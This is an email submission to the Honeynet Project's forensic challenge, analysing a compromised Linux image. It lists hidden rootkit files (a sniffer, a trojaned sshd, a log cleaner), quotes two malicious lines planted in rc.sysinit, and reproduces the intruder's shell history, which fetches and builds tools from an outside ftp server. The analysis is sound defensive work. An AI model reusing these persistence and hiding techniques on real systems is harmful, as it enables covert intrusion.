From wolfgang.berbig@gmx.net Fri May 25 19:40:31 2001 Date: Sat, 26 May 2001 01:52:47 +0200 From: 'Wolfgang Berbig' Reply-To: admin@home.lan To: project@honeynet.org Subject: Scan of the Month (May) Hello Honeynet people, first one thing: I'm not a security professional, I'm only an operator, or, if you like it better, a system maintainer. But it's a kind of passion to stay up to date with security issues. Now let's get to your root-image: The first thing(s) I found (after 2 minutes) were the two textfiles located in /dev: -rw-r--r-- 1 root root 87 Mar 16 01:45 last -rw-r--r-- 1 root root 71 Mar 16 01:45 rpm The first one contains network addresses and a few other numbers. The last contains (I think) program names like linsniffer, smurf and the like. After that, I found two suspicious modifications within the file /etc/rc.d/rc.sysinit: } & /usr/bin/lsattr -t1 -X53 -p The first one I couldn't find in your root image (maybe in the /usr partition ?). I've seen (on other systems) a binary named "[", but never one named "}". It is possibly a link to a sshd trojan or a sniffer (see below). AFAIK there are no such commandline options for lsattr, so maybe a trojan, too? After that, I didn't know where to look for parts of the rootkit. :-( I searched for files with the modification date of the two found in /dev (stupid, isn't it?), and I found the following: drwxr-xr-x 2 root root 1024 May 25 22:22 dev/ida/.drag-on/ drwxr-xr-x 2 root root 1024 Mar 16 01:45 dev/ida/.. <-- reads ".. " Both directories have the same content: drwxr-xr-x 2 root root 1024 May 25 22:22 . drwxrwxr-x 4 root root 12288 Mar 16 01:45 .. -rwx------ 1 root root 7165 Mar 16 01:45 linsniffer -rwx------ 1 root root 75 Mar 16 01:45 logclear -rwxr-xr-x 1 root root 632066 Mar 16 01:45 mkxfs -rw-r--r-- 1 root root 708 Mar 16 01:45 s -rwxr-xr-x 1 root root 4060 Mar 16 01:45 sense -rwx------ 1 root root 8268 Mar 16 01:45 sl2 -rw------- 1 root root 540 Mar 16 01:45 ssh_host_key -rw------- 1 root root 512 Mar 16 14:45 ssh_random_seed -rw-r--r-- 1 root root 138 Mar 16 16:28 tcp.log The two ssh* files belong to the binary "mkxfs", which is a trojaned version of sshd (V 1.2.27, statically linked). "s" is the sshd_config, "sl2" seems to be a portscanner, "linsniffer" of course a password sniffer, "sense" is a perl tool, "logclear" a shell tool for the pass- word sniffer, and tcp.log is the sniffer'slogfile. The trojan sshd listens on port 5 (-> "s"). The last interesting file I found was the .bash_history. The intruder missed obviously to clean that file: exec tcsh ls mkdir /var/... ls cd /var/... ftp ftp.home.ro tar -zxvf emech-2.8.tar.gz cd emech-2.8 ./configure y make make make install mv sample.set mech.set pico mech.set ./mech cd /etc pico ftpaccess ls exit As you can see, this guy used a rootkit named "emech" from a Romanian (?) ftp server. But you didn't provide the /var filesystem in your image ... This rootkit modified the /etc/services. There are no unknown entries (for me). Also the /etc/inetd.conf was modified. In this file, I didn't see anything unusual, only one thing was wrong with it (in my opinion): there were not many active services, maybe the rootkit commented out a few (dangerous) daemons? Your last "Scan of the Month" was nice to read. I didn't know how much information one could get from a snort log. I think you do a great work with your "Honeynet Project". Congratulations especially to Lance for his excellent Whitepapers on his homepage. -- Mit freundlichen Gruessen, Kind regards, Wolfgang Berbig MCSE - Must Consult Someone Experienced E-Mail: wolfgang.berbig@gmx.net -- I worry that 10 or 15 years from now, my children will come to me and say: 'Daddy, where were you when they took freedom of the press away from the Internet?' - Mike Godwin (from: http://freenet.sourceforge.net)